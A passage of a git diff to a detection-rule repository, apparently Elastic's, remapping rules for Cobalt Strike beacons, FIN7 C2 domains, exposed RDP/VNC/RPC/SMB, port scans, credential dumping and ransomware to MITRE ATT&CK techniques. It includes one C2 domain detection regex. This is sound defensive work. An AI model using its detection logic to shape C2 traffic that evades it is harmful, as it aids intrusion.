"https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/network/command_and_control_cobalt_strike_beacon.toml b/rules/network/command_and_control_cobalt_strike_beacon.toml index c5d168d66d3..025c8ebf198 100644 --- a/rules/network/command_and_control_cobalt_strike_beacon.toml +++ b/rules/network/command_and_control_cobalt_strike_beacon.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/06" integration = ["network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -82,24 +82,28 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + [[rule.threat.technique]] id = "T1568" name = "Dynamic Resolution" reference = "https://attack.mitre.org/techniques/T1568/" + [[rule.threat.technique.subtechnique]] id = "T1568.002" name = "Domain Generation Algorithms" reference = "https://attack.mitre.org/techniques/T1568/002/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/network/command_and_control_cobalt_strike_default_teamserver_cert.toml b/rules/network/command_and_control_cobalt_strike_default_teamserver_cert.toml index 3e98f2fdb7b..5afb949f418 100644 --- a/rules/network/command_and_control_cobalt_strike_default_teamserver_cert.toml +++ b/rules/network/command_and_control_cobalt_strike_default_teamserver_cert.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/05" integration = ["network_traffic"] maturity = "production" -updated_date = "2025/04/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -87,19 +87,28 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique.subtechnique]] id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" +[[rule.threat.technique]] +id = "T1573" +name = "Encrypted Channel" +reference = "https://attack.mitre.org/techniques/T1573/" +[[rule.threat.technique.subtechnique]] +id = "T1573.002" +name = "Asymmetric Cryptography" +reference = "https://attack.mitre.org/techniques/T1573/002/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/network/command_and_control_fin7_c2_behavior.toml b/rules/network/command_and_control_fin7_c2_behavior.toml index 038ab832275..8a8e20de3b8 100644 --- a/rules/network/command_and_control_fin7_c2_behavior.toml +++ b/rules/network/command_and_control_fin7_c2_behavior.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/06" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -43,24 +43,28 @@ destination.domain:/[a-zA-Z]{4,5}\.(pw|us|club|info|site|top)/ AND NOT destinati [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + [[rule.threat.technique]] id = "T1568" name = "Dynamic Resolution" reference = "https://attack.mitre.org/techniques/T1568/" + [[rule.threat.technique.subtechnique]] id = "T1568.002" name = "Domain Generation Algorithms" reference = "https://attack.mitre.org/techniques/T1568/002/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/network/command_and_control_halfbaked_beacon.toml b/rules/network/command_and_control_halfbaked_beacon.toml index 1330bc27526..929355c8b37 100644 --- a/rules/network/command_and_control_halfbaked_beacon.toml +++ b/rules/network/command_and_control_halfbaked_beacon.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/06" integration = ["network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -80,24 +80,18 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" -[[rule.threat.technique]] -id = "T1568" -name = "Dynamic Resolution" -reference = "https://attack.mitre.org/techniques/T1568/" [[rule.threat.technique.subtechnique]] -id = "T1568.002" -name = "Domain Generation Algorithms" -reference = "https://attack.mitre.org/techniques/T1568/002/" - - +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/network/command_and_control_nat_traversal_port_activity.toml b/rules/network/command_and_control_nat_traversal_port_activity.toml index e70052c7f23..8a8f0d1a7d7 100644 --- a/rules/network/command_and_control_nat_traversal_port_activity.toml +++ b/rules/network/command_and_control_nat_traversal_port_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -75,8 +75,12 @@ IPSEC NAT Traversal facilitates secure VPN communication across NAT devices by e [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1572" +name = "Protocol Tunneling" +reference = "https://attack.mitre.org/techniques/T1572/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/network/command_and_control_port_26_activity.toml b/rules/network/command_and_control_port_26_activity.toml index 2f266661300..68fd2ce302f 100644 --- a/rules/network/command_and_control_port_26_activity.toml +++ b/rules/network/command_and_control_port_26_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -75,20 +75,22 @@ SMTP, typically operating on port 25, is crucial for email transmission. However [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1048" -name = "Exfiltration Over Alternative Protocol" -reference = "https://attack.mitre.org/techniques/T1048/" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.003" +name = "Mail Protocols" +reference = "https://attack.mitre.org/techniques/T1071/003/" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat.technique]] +id = "T1571" +name = "Non-Standard Port" +reference = "https://attack.mitre.org/techniques/T1571/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml b/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml index 1c67c535c25..543c85bbf79 100644 --- a/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml +++ b/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -31,7 +31,7 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana- risk_score = 47 rule_id = "8c1bdde8-4204-45c0-9e0c-c85ca3902488" severity = "medium" -tags = ["Tactic: Command and Control", "Domain: Endpoint", "Use Case: Threat Detection", "Data Source: PAN-OS", "Resources: Investigation Guide"] +tags = ["Domain: Endpoint", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: PAN-OS", "Resources: Investigation Guide"] timeline_id = "300afc76-072d-4261-864d-4149714bf3f1" timeline_title = "Comprehensive Network Timeline" timestamp_override = "event.ingested" @@ -113,32 +113,12 @@ RDP allows administrators to remotely manage systems, but exposing it to the int [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml b/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml index bdb7850821e..d484d333516 100644 --- a/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml +++ b/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/05/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana- risk_score = 73 rule_id = "5700cb81-df44-46aa-a5d7-337798f53eb8" severity = "high" -tags = ["Tactic: Command and Control", "Domain: Endpoint", "Use Case: Threat Detection", "Data Source: PAN-OS", "Resources: Investigation Guide"] +tags = ["Domain: Endpoint", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: PAN-OS", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -108,26 +108,26 @@ VNC allows remote control of systems, facilitating maintenance and resource shar [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1219" -name = "Remote Access Tools" -reference = "https://attack.mitre.org/techniques/T1219/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/network/command_and_control_vnc_virtual_network_computing_to_the_internet.toml b/rules/network/command_and_control_vnc_virtual_network_computing_to_the_internet.toml index 99c927ca904..da5ce08b9b3 100644 --- a/rules/network/command_and_control_vnc_virtual_network_computing_to_the_internet.toml +++ b/rules/network/command_and_control_vnc_virtual_network_computing_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/05/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -109,14 +109,18 @@ VNC is a tool that allows remote control of computers, often used by administrat [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" +[[rule.threat.technique.subtechnique]] +id = "T1219.003" +name = "Remote Access Hardware" +reference = "https://attack.mitre.org/techniques/T1219/003/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/network/discovery_potential_network_sweep_detected.toml b/rules/network/discovery_potential_network_sweep_detected.toml index 0659815cbd5..e466d21230d 100644 --- a/rules/network/discovery_potential_network_sweep_detected.toml +++ b/rules/network/discovery_potential_network_sweep_detected.toml @@ -2,7 +2,7 @@ creation_date = "2023/05/17" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/02/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -22,14 +22,7 @@ name = "Potential Network Sweep Detected" risk_score = 21 rule_id = "781f8746-2180-4691-890c-4c96d11ca91d" severity = "low" -tags = [ - "Domain: Network", - "Tactic: Discovery", - "Tactic: Reconnaissance", - "Use Case: Network Security Monitoring", - "Data Source: PAN-OS", - "Resources: Investigation Guide" -] +tags = ["Domain: Network", "Use Case: Network Security Monitoring", "Tactic: Discovery", "Data Source: PAN-OS", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "threshold" query = ''' @@ -90,25 +83,6 @@ reference = "https://attack.mitre.org/techniques/T1046/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1595" -name = "Active Scanning" -reference = "https://attack.mitre.org/techniques/T1595/" - -[[rule.threat.technique.subtechnique]] -id = "T1595.001" -name = "Scanning IP Blocks" -reference = "https://attack.mitre.org/techniques/T1595/001/" - -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" - [rule.threshold] field = ["source.ip"] value = 1 diff --git a/rules/network/discovery_potential_port_scan_detected.toml b/rules/network/discovery_potential_port_scan_detected.toml index 872921d9502..39833c138f6 100644 --- a/rules/network/discovery_potential_port_scan_detected.toml +++ b/rules/network/discovery_potential_port_scan_detected.toml @@ -2,7 +2,7 @@ creation_date = "2023/05/17" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/02/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -22,14 +22,7 @@ name = "Potential Network Scan Detected" risk_score = 21 rule_id = "0171f283-ade7-4f87-9521-ac346c68cc9b" severity = "low" -tags = [ - "Domain: Network", - "Tactic: Discovery", - "Tactic: Reconnaissance", - "Use Case: Network Security Monitoring", - "Data Source: PAN-OS", - "Resources: Investigation Guide" -] +tags = ["Domain: Network", "Use Case: Network Security Monitoring", "Tactic: Discovery", "Data Source: PAN-OS", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -97,21 +90,3 @@ reference = "https://attack.mitre.org/techniques/T1046/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1595" -name = "Active Scanning" -reference = "https://attack.mitre.org/techniques/T1595/" - -[[rule.threat.technique.subtechnique]] -id = "T1595.001" -name = "Scanning IP Blocks" -reference = "https://attack.mitre.org/techniques/T1595/001/" - -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/network/discovery_potential_syn_port_scan_detected.toml b/rules/network/discovery_potential_syn_port_scan_detected.toml index 42cfe232eed..10e3cd3c7c2 100644 --- a/rules/network/discovery_potential_syn_port_scan_detected.toml +++ b/rules/network/discovery_potential_syn_port_scan_detected.toml @@ -2,7 +2,7 @@ creation_date = "2023/05/17" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/02/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -93,16 +93,10 @@ id = "T1595" name = "Active Scanning" reference = "https://attack.mitre.org/techniques/T1595/" -[[rule.threat.technique.subtechnique]] -id = "T1595.001" -name = "Scanning IP Blocks" -reference = "https://attack.mitre.org/techniques/T1595/001/" - [rule.threat.tactic] id = "TA0043" name = "Reconnaissance" reference = "https://attack.mitre.org/tactics/TA0043/" - [rule.threshold] field = ["destination.ip", "source.ip"] value = 1 diff --git a/rules/network/initial_access_fortigate_sso_login_from_unusual_source.toml b/rules/network/initial_access_fortigate_sso_login_from_unusual_source.toml index 83e4f3cdfb2..1480a6797d8 100644 --- a/rules/network/initial_access_fortigate_sso_login_from_unusual_source.toml +++ b/rules/network/initial_access_fortigate_sso_login_from_unusual_source.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/28" integration = ["fortinet_fortigate"] maturity = "production" -updated_date = "2026/01/28" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -95,19 +95,23 @@ FROM logs-fortinet_fortigate.* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/network/initial_access_react_server_components_rce_attempt.toml b/rules/network/initial_access_react_server_components_rce_attempt.toml index 3742e5f28eb..6acf88afcb6 100644 --- a/rules/network/initial_access_react_server_components_rce_attempt.toml +++ b/rules/network/initial_access_react_server_components_rce_attempt.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["network_traffic"] maturity = "production" -updated_date = "2025/12/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -93,31 +93,31 @@ network where http.request.method == "POST" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.007" name = "JavaScript" reference = "https://attack.mitre.org/techniques/T1059/007/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/network/initial_access_react_server_rce_network_alerts.toml b/rules/network/initial_access_react_server_rce_network_alerts.toml index c319a5afcc6..0005908b26e 100644 --- a/rules/network/initial_access_react_server_rce_network_alerts.toml +++ b/rules/network/initial_access_react_server_rce_network_alerts.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/10" integration = ["panw", "cisco_ftd", "fortinet_fortigate", "suricata"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -55,20 +55,7 @@ references = [ risk_score = 73 rule_id = "1aefed68-eecd-47cc-9044-4a394b60061d" severity = "high" -tags = [ - "Domain: Network", - "Domain: Application", - "Domain: Web", - "Use Case: Threat Detection", - "Use Case: Vulnerability", - "Tactic: Initial Access", - "Tactic: Execution", - "Data Source: PAN-OS", - "Data Source: Fortinet", - "Data Source: Suricata", - "Data Source: Cisco FTD", - "Resources: Investigation Guide", -] +tags = ["Domain: Network", "Domain: Application", "Domain: Web", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Initial Access", "Data Source: PAN-OS", "Data Source: Fortinet", "Data Source: Suricata", "Data Source: Cisco FTD", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -82,31 +69,13 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.007" -name = "JavaScript" -reference = "https://attack.mitre.org/techniques/T1059/007/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/network/initial_access_rpc_remote_procedure_call_from_the_internet.toml b/rules/network/initial_access_rpc_remote_procedure_call_from_the_internet.toml index 492129f623e..57bd58826e7 100644 --- a/rules/network/initial_access_rpc_remote_procedure_call_from_the_internet.toml +++ b/rules/network/initial_access_rpc_remote_procedure_call_from_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/03/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -101,14 +101,13 @@ RPC enables remote management and resource sharing, crucial for system administr [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml b/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml index 2072a632c94..c2559471478 100644 --- a/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml +++ b/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -21,7 +21,7 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana- risk_score = 73 rule_id = "32923416-763a-4531-bb35-f33b9232ecdb" severity = "high" -tags = ["Tactic: Initial Access", "Domain: Endpoint", "Use Case: Threat Detection", "Data Source: PAN-OS", "Resources: Investigation Guide"] +tags = ["Domain: Endpoint", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Lateral Movement", "Data Source: PAN-OS", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -100,14 +100,26 @@ RPC enables remote management and resource sharing across networks, crucial for [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/network/initial_access_smb_windows_file_sharing_activity_to_the_internet.toml b/rules/network/initial_access_smb_windows_file_sharing_activity_to_the_internet.toml index 18f1e6a95d9..0d15c5e57be 100644 --- a/rules/network/initial_access_smb_windows_file_sharing_activity_to_the_internet.toml +++ b/rules/network/initial_access_smb_windows_file_sharing_activity_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/01/07" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -21,7 +21,7 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana- risk_score = 47 rule_id = "c82b2bd8-d701-420c-ba43-f11a155b681a" severity = "medium" -tags = ["Tactic: Initial Access", "Domain: Network", "Use Case: Threat Detection", "Data Source: PAN-OS", "Resources: Investigation Guide"] +tags = ["Domain: Network", "Use Case: Threat Detection", "Tactic: Exfiltration", "Data Source: PAN-OS", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -101,30 +101,16 @@ SMB, a protocol for sharing files and resources within trusted networks, is vuln [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1048" name = "Exfiltration Over Alternative Protocol" reference = "https://attack.mitre.org/techniques/T1048/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - - [rule.new_terms] field = "new_terms_fields" value = ["source.ip"] diff --git a/rules/network/initial_access_unsecure_elasticsearch_node.toml b/rules/network/initial_access_unsecure_elasticsearch_node.toml index 3e4f65b7211..d3e5aeaf8b8 100644 --- a/rules/network/initial_access_unsecure_elasticsearch_node.toml +++ b/rules/network/initial_access_unsecure_elasticsearch_node.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/11" integration = ["network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -66,7 +66,7 @@ references = [ risk_score = 47 rule_id = "31295df3-277b-4c56-a1fb-84e31b4222a9" severity = "medium" -tags = ["Use Case: Threat Detection", "Tactic: Initial Access", "Domain: Endpoint", "Resources: Investigation Guide"] +tags = ["Use Case: Threat Detection", "Domain: Endpoint", "Tactic: Reconnaissance", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -79,14 +79,13 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" +[[rule.threat.technique]] +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/promotions/credential_access_endgame_cred_dumping_detected.toml b/rules/promotions/credential_access_endgame_cred_dumping_detected.toml index d38cd884d91..41db6231b23 100644 --- a/rules/promotions/credential_access_endgame_cred_dumping_detected.toml +++ b/rules/promotions/credential_access_endgame_cred_dumping_detected.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2025/03/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -73,19 +73,13 @@ Elastic Endgame is a security solution that monitors and detects suspicious acti [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" -[[rule.threat.technique.subtechnique]] -id = "T1003.001" -name = "LSASS Memory" -reference = "https://attack.mitre.org/techniques/T1003/001/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/promotions/endgame_ransomware_detected.toml b/rules/promotions/endgame_ransomware_detected.toml index 9f8c169466d..f52d51ab54c 100644 --- a/rules/promotions/endgame_ransomware_detected.toml +++ b/rules/promotions/endgame_ransomware_detected.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2025/03/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -25,7 +25,7 @@ setup = """## Setup For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "critical" -tags = ["Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = ["Tactic: Impact", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -67,3 +67,15 @@ Elastic Endgame is a security solution designed to detect and respond to threats - Enhance monitoring and detection capabilities by configuring alerts for similar event patterns and behaviors identified in the query fields. - Report the incident to relevant authorities and stakeholders as per organizational policy and legal requirements, ensuring compliance with any regulatory obligations.""" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1486" +name = "Data Encrypted for Impact" +reference = "https://attack.mitre.org/techniques/T1486/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/promotions/endgame_ransomware_prevented.toml b/rules/promotions/endgame_ransomware_prevented.toml index 28f96352a27..4e91b760d30 100644 --- a/rules/promotions/endgame_ransomware_prevented.toml +++ 